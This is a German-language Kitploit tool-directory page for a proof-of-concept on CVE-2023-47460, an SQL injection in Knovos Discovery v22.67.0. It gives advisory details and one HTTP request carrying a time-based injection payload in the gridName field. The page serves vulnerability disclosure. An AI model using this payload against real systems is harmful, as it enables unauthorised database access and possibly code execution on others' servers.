Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-47460 — Proof-of-Concept-Exploit für eine SQL-Injection in Knovos Discovery v22.67.0 über den Endpunkt /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure, der Remotecodeausführung und Informationspreisgabe ermöglicht. | Kitploit
Tools/GitHubGitHub/aleksey-vi/cve-2023-47460
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubaleksey-vi/cve-2023-47460

CVE-2023-47460

Proof-of-Concept-Exploit für eine SQL-Injection in Knovos Discovery v22.67.0 über den Endpunkt /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure, der Remotecodeausführung und Informationspreisgabe ermöglicht.

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-47460

Beschreibung

SQL-Injection-Schwachstelle in Knovos Discovery v.22.67.0 ermöglicht es einem entfernten Angreifer, beliebigen Code über die Komponente /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure auszuführen

Schwachstellentyp

SQL-Injection

Hersteller des Produkts

Knovos Discovery

Betroffene Produktcodebasis

Version 22.67.0 - Version 22.67.0

Betroffene Komponente

/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure

Angriffsart

Remote

Auswirkung Codeausführung

true

Auswirkung Informationsoffenlegung

true

Entdecker

  • Aleksey Vistorobskiy

Angriffsvektoren

autorisierter Benutzer

Request:

root@kitploit:~
POST /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure?caseMappingId=*** HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close

{
  "gridName":"Inventory-grid' waitfor delay'0:0:50'--",
  "uID":"10"
}

Response:

Referenz

  • https://www.knovos.com/
  • https://github.com/aleksey-vi/CVE-2023-47460
Tool herunterladen